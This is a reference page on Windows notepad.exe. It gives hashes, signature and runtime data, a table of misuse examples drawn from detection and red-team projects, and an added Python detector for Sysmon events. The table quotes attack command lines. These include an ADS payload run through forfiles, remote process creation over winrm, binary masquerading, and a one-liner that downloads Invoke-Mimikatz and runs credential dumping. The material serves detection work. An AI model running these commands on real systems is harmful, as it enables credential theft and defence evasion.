notepad.exe

  • File Path: C:\Windows\system32\notepad.exe
  • Description: Notepad

Screenshot

[screenshot of the notepad.exe window; image not reproduced in this text]

Hashes

Type Hash
MD5 054F6E4419404C94F35888CEA6B4DE32
SHA1 FE48F836ED5264320F4C28E01A4225DC01329D11
SHA256 CA2837031952C32BC1639A416F5C2ADCEEBF33507D216E554A3B47B17C52E9B1
SHA384 5FC86291D631CC82FC2F03B9CEB6CF9C7004A180445BD8ACDA31A594376B3FB7325AD1BA448F41832BA683640F75E700
SHA512 F7B941B8351F1A8203AEE6D7794295AA2B111E0F609A0D07DED4CEC6651A7AD751F7623DF2B90862E4A47E1AD0D873E8D363A91954A78DEB181CFD62362B232A
SSDEEP 6144:vFbZ7SPu5J0DQ/zaQg56AOhB7ZrgeI5tT/fUWIzh:BZ75J0DQ/rg56Ae7ZMeI5C3t
IMP (import hash) 4089A6EA56504C3C66D7744AC0A8131A
PESHA1 4E5100BFA9D55EF9B19982FD7C7B821ADFA549C9
PE256 B5D7BBAA1245FF0507504B565B2C4ED4BBE3225A407705D2A20CD6598A15A4AB

Runtime Data

Window Title:

Untitled - Notepad

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\notepad.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(R-D) C:\Windows\SystemResources\notepad.exe.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_ca04af081b815d21 File
\BaseNamedObjects\__ComCatalogCache__ Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\BaseNamedObjects\windows_shell_global_counters Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\system32\notepad.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\System32\win32u.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: NOTEPAD.EXE.MUI (read from the en-US MUI resource loaded alongside the binary; the version resource embedded in notepad.exe itself, which is what Sysmon reports as OriginalFileName, is NOTEPAD.EXE)
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/ca2837031952c32bc1639a416f5c2adceebf33507d216e554a3b47b17c52e9b1/detection

File Similarity (ssdeep match)

File Score
C:\Windows\notepad.exe 100

Possible Misuse

The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes. Note that most entries below use notepad.exe as a harmless demonstration payload or as the host or parent for another technique (process injection, parent PID spoofing, IFEO debuggers, masquerading, DLL side-loading of the unrelated Notepad++ updater), so the detection value lies in who launches notepad.exe, from which path, with which hash, and whether it makes network connections, rather than in notepad.exe itself.

Source Source File Example License
sigma image_load_susp_image_load.yml - '\notepad.exe' DRL 1.0
sigma net_connection_win_notepad_network_connection.yml title: Notepad Making Network Connection DRL 1.0
sigma net_connection_win_notepad_network_connection.yml description: Detects suspicious network connection by Notepad DRL 1.0
sigma net_connection_win_notepad_network_connection.yml - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ DRL 1.0
sigma net_connection_win_notepad_network_connection.yml Image|endswith: '\notepad.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - '\Program Files (x86)\Notepad++\updater\GUP.exe' DRL 1.0
sigma proc_creation_win_susp_gup.yml - Execution of tools named GUP.exe and located in folders different than Notepad++\updater DRL 1.0
LOLBAS Gpup.yml Description: Execute another command through gpup.exe (Notepad++ binary).  
LOLBAS Gpup.yml - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '  
LOLBAS Explorer.yml - Command: explorer.exe C:\Windows\System32\notepad.exe  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"  
LOLBAS Forfiles.yml Description: Executes the evil.exe Alternate Data Stream (ADS) since there is a match for notepad.exe in the c:\windows\system32 folder.  
LOLBAS pester.yml - Command: Pester.bat [/help|?|-?|/?] "$null; notepad"  
LOLBAS pester.yml Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'  
LOLBAS Winrm.yml - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'  
LOLBAS Cdb.yml - Command: cdb.exe -cf x64_calc.wds -o notepad.exe  
LOLBAS Dxcap.yml - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe  
LOLBAS Dxcap.yml Description: Launch notepad as a subprocess of Dxcap.exe  
atomic-red-team index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md cmd.exe /c %APPDATA%\notepad.exe /B MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md del /Q /F %APPDATA%\notepad.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1047.md When the test completes, a new process will be started locally. A notepad application will be started when input is left on default. MIT License. © 2018 Red Canary
atomic-red-team T1047.md | process_to_execute | Name or path of process to execute. | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1047.md The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1047.md You should expect to see notepad.exe running after execution of this test. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. MIT License. © 2018 Red Canary
atomic-red-team T1055.001.md | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | spawnto_process_name | Name of the process to spawn | String | notepad| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md This module executes notepad.exe from within the WINWORD.EXE process MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',(String).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr MIT License. © 2018 Red Canary
atomic-red-team T1105.md Upon successful execution the test will open calculator and Notepad executable for 10 seconds. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a notepad.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1197.md This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" MIT License. © 2018 Red Canary
atomic-red-team T1197.md | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md forfiles /p c:\windows\system32 /m notepad.exe /c #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | String | notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Copy-Item -Path "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe" -Destination "$Env:windir\System32\Tasks\notepad.exe" MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md InstallUtilPath = "$Env:windir\System32\Tasks\notepad.exe" MIT License. © 2018 Red Canary
atomic-red-team T1218.004.md Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when successfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when successfully executed. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Change Default File Association From cmd.exe of hta to notepad. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. MIT License. © 2018 Red Canary
atomic-red-team T1546.003.md CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} MIT License. © 2018 Red Canary
atomic-red-team T1546.010.md AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application's IFEO will be prepended to the application's name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will MIT License. © 2018 Red Canary
atomic-red-team T1574.012.md still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. MIT License. © 2018 Red Canary
signature-base apt_bluetermite_emdivi.yar $s4 = "\NOTEPAD.EXE" fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $s2 = "Notepad++.exe" fullword wide CC BY-NC 4.0
signature-base apt_olympic_destroyer.yar $s3 = "\system32\notepad.exe" fullword wide CC BY-NC 4.0
signature-base apt_poisonivy.yar $s0 = "\notepad.exe" fullword ascii /* score: '11.025' */ CC BY-NC 4.0
signature-base apt_ta17_293A.yar $au2 = "/notepad.png" CC BY-NC 4.0
signature-base apt_wildneutron.yar $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s" fullword ascii /* PEStudio Blacklist: strings / / score: '46.00' */ CC BY-NC 4.0
signature-base apt_woolengoldfish.yar $s4 = "oShellLink.IconLocation = "notepad.exe, 0"" fullword CC BY-NC 4.0
signature-base crime_ransom_ragna_locker.yar $s2 = "\notepad.exe" fullword wide /* Show ransom note to the victim*/ CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s14 = "NOTEPAD.EXE result.txt" fullword ascii CC BY-NC 4.0
signature-base gen_powershell_empire.yar $s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = "Abnormal notepad.exe - typical strings not found in file" CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp = "Software\Microsoft\Notepad" wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar $winxp_de = "Software\Microsoft\Notepad" wide CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == "notepad.exe" CC BY-NC 4.0
stockpile 3796a00b-b11d-4731-b4ca-275a07d83299.yml Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; Apache-2.0
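The patterns in the table above (the Sigma "Notepad Making Network Connection" rule, the T1036.003 cscript.exe-renamed-to-notepad.exe masquerade, the T1547.002 / T1197 / T1055.012 / T1202 parent chains, and the SHA256 from the Hashes section) combined into one detector over Sysmon-style process-creation and network-connection events. This is an added example and not code from Strontic or from the Sigma, LOLBAS, Atomic Red Team, signature-base or stockpile projects; the event records are constructed for the example, the field names follow Sysmon's (Image, OriginalFileName, ParentImage, ParentCommandLine, Hashes), and the rule names are the example's own.

```python
"""Added example: apply the notepad.exe misuse patterns from the table above to
Sysmon-style events.  Not code from Strontic, Sigma, LOLBAS or Atomic Red Team;
the SAMPLE_EVENTS below are constructed, not real telemetry."""
import ntpath
from typing import Dict, List, Tuple

Event = Dict[str, object]

PROCESS_CREATE = 1   # Sysmon Event ID 1
NETWORK_CONNECT = 3  # Sysmon Event ID 3

# SHA256 of C:\Windows\system32\notepad.exe from the Hashes section above
# (build 10.0.19041.1).  Other Windows builds ship other hashes: populate this
# set from golden images and treat a miss as "unknown", not as proof of tampering.
KNOWN_GOOD_SHA256 = {
    "CA2837031952C32BC1639A416F5C2ADCEEBF33507D216E554A3B47B17C52E9B1",
}

# Directories a genuine notepad.exe lives in (File Path and ssdeep match above).
STANDARD_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}

# Parents the Atomic tests above use to launch notepad.exe and that have no
# business doing so: lsass.exe (T1547.002), WINWORD.EXE (T1055.012),
# forfiles.exe (T1202).  svchost.exe hosting BITS (T1197) is matched on its
# command line below.  Assumption of this example, not a vendor list.
SUSPICIOUS_PARENTS = {"lsass.exe", "winword.exe", "forfiles.exe"}


def sha256_from_hashes(hashes: str) -> str:
    """Extract SHA256 from Sysmon's 'MD5=...,SHA256=...,IMPHASH=...' field."""
    for part in hashes.split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().upper()
    return ""


def check_event(ev: Event) -> List[str]:
    """Return the names of the misuse patterns a single event matches."""
    image = str(ev.get("Image", ""))
    if ntpath.basename(image).lower() != "notepad.exe":
        return []
    findings: List[str] = []
    directory = ntpath.dirname(image).lower()

    if ev.get("EventID") == NETWORK_CONNECT:
        # Sigma: Image|endswith '\notepad.exe' on a network-connection event
        findings.append("notepad_network_connection")

    if ev.get("EventID") == PROCESS_CREATE:
        if directory not in STANDARD_DIRS:
            # T1036.003: cscript.exe copied to %APPDATA%\notepad.exe and run
            findings.append("notepad_outside_system_dirs")
        original = str(ev.get("OriginalFileName", "")).upper()
        if original and original != "NOTEPAD.EXE":
            # Renamed binary: its version resource still names the real file
            findings.append("original_filename_mismatch")
        digest = sha256_from_hashes(str(ev.get("Hashes", "")))
        if directory in STANDARD_DIRS and digest and digest not in KNOWN_GOOD_SHA256:
            findings.append("unknown_hash_in_system_dir")
        parent = ntpath.basename(str(ev.get("ParentImage", ""))).lower()
        parent_cmd = str(ev.get("ParentCommandLine", "")).lower()
        if parent in SUSPICIOUS_PARENTS or (parent == "svchost.exe" and "bits" in parent_cmd):
            findings.append("suspicious_parent")
    return findings


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Run check_event over every event; returns (event index, pattern) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]


GOOD_HASH = "SHA256=" + next(iter(KNOWN_GOOD_SHA256))

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "Hashes": GOOD_HASH},            # benign
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},                   # network
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Roaming\notepad.exe", "OriginalFileName": "cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "Hashes": "SHA256=" + "11" * 32},  # T1036.003
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\System32\lsass.exe", "Hashes": GOOD_HASH},     # T1547.002
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "Hashes": "SHA256=" + "00" * 32},  # replaced file
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "DestinationIp": "203.0.113.10"},  # ignored
]

if __name__ == "__main__":
    for index, pattern in scan(SAMPLE_EVENTS):
        print(f"event[{index}] {SAMPLE_EVENTS[index]['Image']}: {pattern}")
```

The hash check only fires for a notepad.exe under a system directory, because an out-of-place copy is already caught by the path check and its hash is expected to differ. The OriginalFileName check needs a Sysmon version that logs that field; the svchost check keys on "BITS" in the parent command line, matching the "svchost.exe -k netsvcs -p -s BITS" chain the T1197 entry describes.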

MIT License. Copyright (c) 2020-2021 Strontic.